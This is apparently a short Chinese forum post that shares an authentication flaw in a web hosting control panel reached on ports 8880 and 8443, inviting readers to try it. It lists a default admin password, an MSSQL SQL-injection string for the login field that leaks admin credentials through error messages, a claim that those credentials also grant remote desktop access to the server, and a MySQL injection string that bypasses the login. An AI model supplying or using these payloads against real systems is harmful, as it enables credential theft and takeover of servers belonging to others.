其实这个漏洞,一年前一个朋友就告诉我了,一直也没怎么玩这个,具体利用 我也没怎么太多去试。好象有点点麻烦, 看到别人都已经放出来了,我也丢出来吧。大家去试吧,

1,在http://xxxxxx.com:8880这里,默认的管理员账户密码是admin   密码stepu

2,在https://xxxxx.com:8443

mssql版本

账号 ‘ union select top 1 login+char(124)+passwd from admin_aliases–

报错,爆出账号密码

登陆后server–>remote desktop账号密码一样
拿到服务器权限

mysql版本
‘union select ‘-1 union select 1,1,1#’#   密码填 1